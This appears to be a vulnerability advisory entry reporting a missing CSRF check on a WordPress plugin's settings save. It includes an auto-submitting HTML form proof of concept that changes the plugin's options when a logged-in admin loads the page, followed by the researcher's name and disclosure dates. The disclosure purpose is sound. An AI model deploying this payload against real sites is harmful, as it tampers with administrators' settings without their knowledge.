The plugin does not have CSRF check when saving its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.
<form action="https://example.com/wp-admin/options-general.php?page=ffe_plugin_options" method="post" id="csrf"> <input type="hidden" name="enable-ffe" value="on"> <input type="hidden" name="num-expiry-days" value="1"> <input type="hidden" name="ffe-png" value="on"> <input type="hidden" name="ffe_save_settings" value="1"> </form><script>csrf.submit()</script>
apple502j
apple502j
Yes
2021-10-04 (about 1 years ago)
2021-10-04 (about 1 years ago)
2022-04-15 (about 1 years ago)